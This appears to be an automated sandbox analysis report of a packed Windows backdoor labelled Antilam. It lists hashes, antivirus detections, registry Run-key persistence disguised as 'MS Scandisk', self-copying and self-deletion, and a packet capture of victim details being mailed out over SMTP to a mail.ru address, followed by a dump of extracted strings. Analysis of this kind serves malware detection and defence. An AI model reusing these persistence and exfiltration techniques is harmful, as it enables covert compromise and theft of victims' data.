Analysis Date2013-12-06 08:16:33
MD5f87cd3255b9c3814cf88c1fad8878275
SHA14dbfabbb359c71ba625cb41c83616117135d142e

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
SectionUPX0 md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
SectionUPX1 md5: 4e11bc65d752282fd01a1dcd7d1d0238 sha1: af6b15c46b595e2b928d3d900b4b5381bffabfc8 size: 178176
Section.rsrc md5: fcc3a6ddaee41da57e770bb2555f8a11 sha1: 5259cb6c6e545caa6bea2f35419ab698bb685b00 size: 3584
Timestamp1992-06-19 22:22:17
PackerUPX -> www.upx.sourceforge.net
PEhash912c228f688f9dc717f64dd6e9eb1dcd0c78ff64
AVmcafeeBackDoor-AJW
AVavgBackDoor.Generic12.BWJP
AVclamavTrojan.Antilam.20b
AVaviraBDS/Antilam.20.C
AVmsseBackdoor:Win32/Antilam.2_0

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\MS Scandisk ➝
C:\WINDOWS\MicrosoftOqerExpress.exe\\x00
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS Scandisk ➝
C:\WINDOWS\MicrosoftOqerExpress.exe\\x00
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\KeyConfig\Con ➝
1\\x00
Creates FileC:\WINDOWS\MicrosoftOqerExpress.exe
Creates ProcessC:\WINDOWS\MicrosoftOqerExpress.exe

Process
↳ C:\WINDOWS\MicrosoftOqerExpress.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\MS Scandisk ➝
C:\WINDOWS\MicrosoftOqerExpress.exe\\x00
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\DirectX\Start ➝
ok\\x00
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS Scandisk ➝
C:\WINDOWS\MicrosoftOqerExpress.exe\\x00
Creates FileC:\WINDOWS\SCAN.DLL
Creates FilePIPE\lsarpc
Creates File\Device\Afd\AsyncSelectHlp
Creates File\Device\Afd\Endpoint
Deletes FileC:\malware.exe

Network Details:

DNSsmtp.mail.ru
Type: A
94.100.177.1
Flows TCP192.168.1.1:1032 ➝ 94.100.177.1:25

Raw Pcap
0x00000000 (00000)   48454c4f 204d4149 4c2e5255 0d0a4d41   HELO MAIL.RU..MA
0x00000010 (00016)   494c2046 524f4d3a 20506173 73406d61   IL FROM: Pass@ma
0x00000020 (00032)   696c2e72 750d0a52 43505420 544f3a20   il.ru..RCPT TO: 
0x00000030 (00048)   3c756c64 61736865 76726164 6d697240   <uldashevradmir@
0x00000040 (00064)   6d61696c 2e72753e 0d0a4441 54410d0a   mail.ru>..DATA..
0x00000050 (00080)   49502041 64647265 73733a20 3139322e   IP Address: 192.
0x00000060 (00096)   3136382e 31362e31 205b3133 395d0d0a   168.16.1 [139]..
0x00000070 (00112)   0d0a436f 6d704e61 6d653a20 434f4d50   ..CompName: COMP
0x00000080 (00128)   55544552 2d585858 5858580d 0a0d0a44   UTER-XXXXXX....D
0x00000090 (00144)   69616c55 7020efe0 f0eeebe8 3a0d0a0d   ialUp ......:...
0x000000a0 (00160)   0a494351 3a200d0a 0d0a0d0a 20202020   .ICQ: ......    
0x000000b0 (00176)   31322f36 2f323031 33202d20 373a3234   12/6/2013 - 7:24
0x000000c0 (00192)   3a343820 414d0d0a 0d0ac7e0 f5eee4e8   :48 AM..........
0x000000d0 (00208)   f2e520ed e0206874 74703a2f 2f686163   .. .. http://hac
0x000000e0 (00224)   6b2d696e 666f2e72 7520e820 efe8f8e8   k-info.ru . ....
0x000000f0 (00240)   f2e520ec ede520ed e0206f67 70726f67   .. ... .. ogprog
0x00000100 (00256)   40756b72 2e6e6574 0d0a2e0d 0a515549   @ukr.net.....QUI
0x00000110 (00272)   540d0a                                T..


Strings
DVCLAL
EXEFILE
MAINICON
PACKAGEINFO
SCAN
TFRMSERVER
TNMSHOW
~ << .
0()(2)
0<6{WDz3
08TE+B%@
#099BCryptIV
@0?CD1
0dW8[+/ ~[
0	fpDefa
"	0`ho<d1
0;oP" 
0p_lod@
#&<0rX
0_VSHWIN32.EXEO
?1Flat
1%sHPd
1u[4aM
1V2sjU
@``2!'
&2B7Tu
2@D|pBy c
-2Dzzo
* ())@-2wg
2 W$G32
}%3C0j
=_3DDk
3EThreadArray
3` )!Hl
3)ia(<'
!3m 9S
3_MAINICON
3%ZvG$$u
(451BK
4-cR50
4?Ct)?S`A
4decgh
4(j,dd
4?\*.k
4K$VnH
4M[\]^ab4M
4MDEFHIO4M
4MDLT\dl4M
4Mnopqrt4M
4PQRTU
4S_AX/-
4suvwx4ME
51<Et:<et6
57tkzu/1
%5B>&W0jD<
5IIHh\
5M$7rasapi
5(OYPF@
5/v]+@
5Virtu$
~5$y49
68EiOT
6CK x	k
&6F_(n
6JO!Ba
76@`pq
77vaw)
<7C(Bb
7gSilver
7 /`LO \E:
7$!!OL~B
7@r{VH
7v7j8t=
;8B]8B_
8H\pL2
	[<*8L
8(o:Db
8#o-PT
@8p-0)
.\8p*o"
8=\RlR@
8Z7"?,U
\:`#9 
95/98 W[i
95; I)
(`9A8:S
9bU	LhAY(&&
9(ctxx
/9$#G.(
"'9mp9
a#1Btp
a1hM#tn.jh"
a1>zpD
A6AI2l
\,aAhgr
A@@/Am
(AbD<x
A-`$bW
advapi32.dll
,a"#FFiY
aj#	!"
Ajhmw2i
akoP_8
Al<c	Lf
AM/PM8A
A:NcpW
and\Delphi\RTLEPUMaskValue
=APMS?
)^A;XT
-(=ayM
ay/x-sw
B&9B00
B>Ct4V
BF^4@44
/B^%h[
:BNMBJ
Boolean
b.?\Run
ByWl'Wor.?
bZ?	_loM ,$
;C0t:?@
c^0tkA#h{=)
C21X(g
C2w;;tis{
C5Xs[0@
`c8iPt\[
]C9MC.GP
C/a&>-
CD-ROM
	{!c#E
_C~(F$r
$Cjr3(
CNE#BI
cOi/zeF
comctl32.dll
CONks,VV
Cou(Lp
CPT TO3<w>W
cpyW,Y`
C*q`Nr!
)C{t\_
cutnX7
+cvLoh
Cz`j&+
\^D:2p
%d8/;;
D@<8L2
].D9(`
d@A/>]u
daudS 
Dd,Lx\
D?E&B%
Device
dFH6\6^
DiskFreeSp08
/DISPLAY<
		dJ>B$l@	
d+~ji2
d[k; th
`DlluP'
?dOUF#
d 'S$Td
=DuVpF
E0es!5J
E-?{#9
EASTROPE
E.cjES
ECK(zT
EClass
ed78)`K
\edialer.ini
EDivBy
EeS60A
eftTop
 ehRaH.
/	E\hv
 EMFtZ
EOutOfMe
e"RCFW
ESOfoRtluw
et8\pk
e:,"<w
	Excep
ExitProcess
e#Ygu4/
}f_ - 
F8;\b}
FaGID>
/FDiag
F.f=<G
ffsiOu
F"<)HK
File DATA.CAB not found
<F/ioe
FlFm"zm
FO3BH@5
FO-l@ 
FontPitc
FqOZTUWVS
\F_-Rf;a 	X
)Fromx
fS;v^/
{F@u"kcb
fxtt.Gp
@fy.x+[[
:,g2&'y
"G4@c#
gdi32.dll
GetLongPathNameAAqNq&O
GetProcAddress
\?^GF1&
:GH0~I
g^Ha']
%(G@ihI
!=+!GM
gppW-k
G%s_%d
gSYMBOLcO
G@ t;h
"gWZ^yW
gZ; |SMw
H2_0Q!/
H33!zl
H6{!~X*
^hA"Ax
H[A~Qz
HARSETDEFAULT5
<H>'$bA
[ hb.h
H~DTLm`&
HEDITD
H#Gla0
, ;Hh|"
hhN?p`
HIFTJIS
HI\;J(u
?,hin 
HJ%NHJ
`&HNg08\$nvlu
Hotkey
+hQ8`Zr 'H
+Hs!h$
Ht =|]
 HTTP/1
HU?oXtZ
h/Vd"H
Hy?D&,m
h$=Y v
[{HZn^w
i48<@D
i4a`)O
i"5Qssw
iamapp&%
"i-C@	0Z
ICA3HfAc
ich~"$
iC>Km?
IdAEkl
i/DR2-W7
Ignor!
IhO84|2w.
}i&isQ/
ijklmM
iLQI0dH
ImageList_Add
?|imCl
Integer
IO} a/v
I[O]Bn
ions Copyright (c) 1983,99 
"IP]H$
%+Iphh
is-)&6
IsEqualGUID
IUnknown
IzAfH]&GUf
J12345H8&
((j1g;
! j$i&
_;;JIc#$
 jjh9Sp> }4
j$Link
jLISTBOX
)Jltp?Fg
J,m5-%m
jP}1NY
><J>P$O
jPSX2m
,JT>@./ x
JvRvD!b0
Jw0y\HZ]
 K1'^6
K%-69VD}H
K;A<|$
@~KAVI
KERNEL32.DLL
'kkk7~
@KL`Eu
K++Lok
k/oZt 
:K(%&R
)/KRIN
:KU$z7
Ky0cB 
Kz`Kc:\a
?((L33M((
>l4,40
 Layouts\'xo
l <BBO	
l!Cl?W
`LdmManu$!
lG%.8y
L~m@cLong\
LoadLibraryA
LookupDHHqlb5	!
Lpv4Z2
l,tG 2;a
,>`L%`W]
L?X+v(
lZRequ
@:$<;M
M0N|*y}&
^m0z;~
Magel	
m=ALB &
Map {j
MaxLengt	F
MBlock
mDhpm^
Menuo)	6
MicrosoftOqerExpress.exe
MjK[[{
^mm!}5
}?Module
Mozsla/4
mp)'l	
mPRmdV
MS Scandisk
 MSWHEEL
_MUST_DIEA7
MV1/HPmPp
My[/XOR
NAVAP!m
nel32.dll
n FhGv>f
N(;F,t
n)l;`6
nmA`x0
NMsmtp
nross&$
nt; Ws
N\vI#T
?<O2t(
O37,Y$I
?'&=O8
O9GHIJKLMNO-
oANSI_Ci
oAscii
ocket<
OEnumAplayD
o&fC?&q
	Oh|'B5``B
Oi G&!T)
o"[jgv
oK.ECOMR,WWEB
ole32.dll
oleaut32.dll
<ole L
OLJMGu
Om|"Gk
OpenPrinterA
oRadio
OSB&U+-
oSH(p8
&ouseZ
;oVBw5
o]W4x'
owg<o//
OwnerM
OWrDxJ
*-&*$P
P2,482
;P<^2r
Pb)6d`
PBq ci
p<C,	l(
P/H9q'
P;\"Hn
Ph[# ,o%5s
PhTvhX
PixUsP
PoQ;mBE
PQPObKQ
!$">PR
Primary
+PTmY(
PurpleGTeal
P$V:0eC
!PWL&B{
P!)x.8
pxkPrQ
q(4w+X
Q?5F)cei+
@\Q	DC
q[F_90
@<,q*-Fa
+qP7PH
+qq[:k_
q>qw;N
Q&Tj$-
|Q	+u@
=QuYyy
QW"AD\
qWl	$s
QwW9N{C
^*!R}`
\r$04$
$@r2 '
>(r^3,@
R7B&9f
rasapi32.dll
RasHangUpA
rB~DeletD
rDHLGM
Rebuil
	Redb	
RegCloseKey
r;E;X%
rH%yc[
RICHED
}Ri&u5"`
rk.tC:
R-~O~(
RrrPP3
RUSSIAN
|RW^\tz
s4 T=N`&
 S5v l
SafecalM
(-Sa`HO
(^.SCJ_LINES/ 
SCv	G6
shell32.dll
ShellExecuteA
SL`qO89
slvSX0
()+,SM
smtp.mail.ru
 $SNZGM=
SOFTWARE\Borl
$'sr&G~+
SS4$GV
StdCtrlsX
STf+h$s
STUVWXYZo
SU<HtH
sWpoK++
Sx,{C/
SXTfMUK
`\SYC0
Sync!_.
*t"	0r<)
#t&<0t%<.t,<,t3
`/t5:L
"t!-6Ks
T6rfaced
t#;A8tiO}
TAdYnc.Z
TAlignment
	TBiDil
TBkicAc
TClipbo
TCUomPrKm
T;C`u',U
(tFOk@
T`Gfuq\
t/gif,
{t%[h!
t<hgUQ
This program must be run under Win32
t{hq}x)P
	Thumb
timeSetEvent
-ti	+tf$
TLHm6n-0)
t.	+Md
tMp(b6
t`n	bQ\
TObject
tp://h
TPropFixup
TPUyVM
tqPJb[\l(
t:	ssRegul7
<'t$<"t *
TT'1aG
TT}4r#
TURKISHH
<tX]V+
T!y#4@
[$uAh#
UD9+d 3
u(]EB9DEa
uG	Fuchsia
-U*ii$
?UIN: Wr
@ukr.net
uldashevradmir@mail.ru
<&uOw6
upx.ts
u	'(qCK
-urlGs@fg
user32.dll
USERCDLL
us/SCkc
ustify
U]u.	Fu*SR
uUPR:,
`UUr$d@e`f
@^(uvX
 uwMtkE
v02FPsfA
v4?{3u
Varian
VariantClear
v!%Bgn
v [dt,
verflowp
_-vfA9?
Vhh:nn'|
V	H-]U
vJN/t@
vN~ ^,!
v@$n31
v!|pA/
V&:P<haFT><
vR(IGKu
vsstat'e
_VXYZM
vY]1a&2'
=v$yPm
_W0`#H
\%W12W
W3thfh
w`<#-7
^Wa^Xo6|
wd!llU
Web[r3
=?Win32t
winmm.dll
WINNLS
winspool.drv
 with 
W~J$#w@
WKeepoc
wKF^cPT
"Wm3!mL5
W>N^n&
WP8M"m
wp!@|H
WrAdminIF
wsock32.dll
W/*tEf
.W$_;tx
wVlw['
wwp.m-
wwwwww
wwwwwwww
WYt t R
x9/H9po
-Xa.lC
X cH&1
&%XDGHM
XEFILE
xi*QgA
xl.T\)Hs
.XMm& V0
:X.n	8
xoj%Bu
xpp^kZ
Xs(%;P5
^^~xtaXt\0u
x#<@|@Z
Y^4w$gt
#$y<	5
Y6tHD$
yB*dM!jh
-ycY.4m"
/Y@Eh`$
YEhis 
Yellow
Y!g[T#
Y_H!G)>
YiW(5	
+Y`J{F
y=Llr+?+NETG 0 ? &to=&@,
*ym,]o
+y;O|c
Y#~|%Ow0
Yq eN 
YskPP74
Y$T0Ao
ytpPoz
Yt.+yt
yWE'Up
Z!	?!-
+Z7riticalSe
z+B@GL
ZE~	rcFk
zevSlguel
*}[ZH(E
,z=h#l@
$zInvalidOp
/)zn}>
$&-Z-n
z(O:P/
&Z@W_O4
	'<%ZX/
ZxgnEW
,ZXZYI